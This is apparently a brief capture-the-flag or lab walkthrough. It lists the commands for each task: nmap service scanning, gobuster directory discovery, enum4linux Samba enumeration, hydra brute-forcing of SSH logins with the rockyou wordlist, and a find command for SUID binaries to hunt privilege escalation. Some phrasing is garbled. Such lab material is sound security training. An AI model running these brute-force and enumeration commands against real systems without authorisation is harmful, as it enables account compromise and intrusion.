In these set of tasks you'll learn the following:
Find the services exposed by the machine. nmap -sV <target> What is the name of the hidden directory on the web server (enter name without /) gobuster dir -u <target> -w <path/to/wordlist> User brute-forcing to find the username & password
What is the username? enum4linux -a <target> What is the password? hydra -t 4 -l <user> -P /usr/share/wordlists/rockyou.txt <service>://<IP>> Enumerate the machine to find any vectors for privilege escalation find / -perm -4000 2> /dev/null To the entirely command, search the vector for privesc on What is the name of the other user you found(all lower case)? Summary
nmap -sV <target> Portscan to open ports and active services.
gobuster dir -u <target> -w /path/to/wordlist Enumerate directories.
enum4linux -a <target> Allows extraction of information where Samba is being used.
hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt ssh://<IP> Using hydra to brute-force the user and password.
If the user has already been identified, follow the syntax: hydra -t 4 -l <nomedouser> -P /usr/share/wordlists/rockyou.txt
ssh <user>@<IP>
find / -perm -4000 2> /dev/null To check which executable programs are active on the machine. Creating a gap for possible privilege escalation.
|